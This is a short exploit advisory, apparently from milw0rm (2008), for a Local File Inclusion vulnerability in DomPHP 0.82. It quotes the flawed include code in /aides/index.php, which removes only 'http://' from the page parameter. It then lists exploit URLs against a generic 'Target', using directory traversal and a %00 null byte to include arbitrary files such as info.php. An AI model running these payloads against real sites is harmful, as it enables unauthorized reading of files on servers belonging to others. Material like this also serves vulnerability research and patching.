Loading ...
Global Do...
News & Politics
2
0
Try Now
Log In
Pricing
1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 2 −−−−− H−T Team [ HouSSaMix + ToXiC350 ] from MoroCCo −−−−−−−− 3 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 4 5 = Author : HouSSaMix From H−T Team 6 7 = Script : DomPHP 0.82 8 = Download : http://www.domphp.com/download/ 9 10 = BUG : Local File Inclusion 11 12 = Vulnerable CODE : 13 ~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~ 14 if (isset($_GET[’page’])) { 15 // On supprime le http:// si tentative de fraude. 16 $page = str_replace("http://","",$_GET[’page’]); 17 include("../aides/".$page.".html"); 18 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 19 20 = Exploit : 21 http://Target/[path]/aides/index.php?page=[LFI]%00 22 23 = Get phpinfo => http://Target/[path]/info.php 24 http://Target/[path]/aides/index.php?page=../info.php%00 25 26 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 27 −−−−− H−T Team [ HouSSaMix + ToXiC350 ] from MoroCCo −−−−−−−− 28 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 29 30 # milw0rm.com [2008−02−09] Page 1/1 DomPHP 0.82 index.php page Local File Inclusion Vulnerability Houssamix 02/09/2008
